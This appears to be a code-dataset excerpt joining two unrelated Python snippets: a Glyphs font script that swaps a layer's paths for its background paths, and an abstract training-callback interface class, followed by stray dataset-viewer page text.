Replaces only the paths in the current active layer with those from the background.
"""
for l in Glyphs.font.selectedLayers[0].parent.layers:
for pi in reversed(range(len(l.paths))):
del l.paths[pi]
for p in l.background.paths:
l.paths.append(p)
|
class AbstractCallback:
"""
Interface that defines how callbacks must be specified.
"""
def __call__(self, epoch, step, performance_measures, context):
"""
Called after every batch by the ModelTrainer.
Parameters:
epoch (int): current epoch number
step (int): current batch number
performance_measures (dict): losses and metrics based on a running average
context (ModelTrainer): reference to the calling ModelTrainer, allows to access members
"""
raise NotImplementedError
def close(self):
"""
Handle cleanup work if necessary. Will be called at the end of the last epoch.
"""
pass |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.